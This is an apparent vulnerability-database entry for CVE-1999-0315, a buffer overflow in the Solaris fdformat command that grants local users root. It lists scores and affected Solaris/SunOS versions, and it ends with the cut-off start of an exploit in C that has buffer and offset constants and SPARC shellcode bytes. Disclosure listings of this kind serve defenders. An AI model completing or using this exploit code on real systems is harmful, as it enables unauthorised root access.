7.2
CVSSv2

CVE-1999-0315

Published: 01/04/1997 Updated: 30/10/2018
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in Solaris fdformat command gives root access to local users.

Vulnerable Product Search on Vulmon Subscribe to Product

sun solaris 2.5.1

sun solaris 2.5

sun solaris 2.6

sun sunos 5.7

sun sunos 5.3

sun solaris 2.4

sun sunos 5.5.1

sun sunos 5.4

sun sunos 5.5

Exploits

--------------------------- lion24c --------------------------------- /* Solaris 24 */ #include #include #include #include #define BUF_LENGTH 264 #define EXTRA 36 #define STACK_OFFSET -56 #define SPARC_NOP 0xa61cc013 u_char sparc_shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3 ...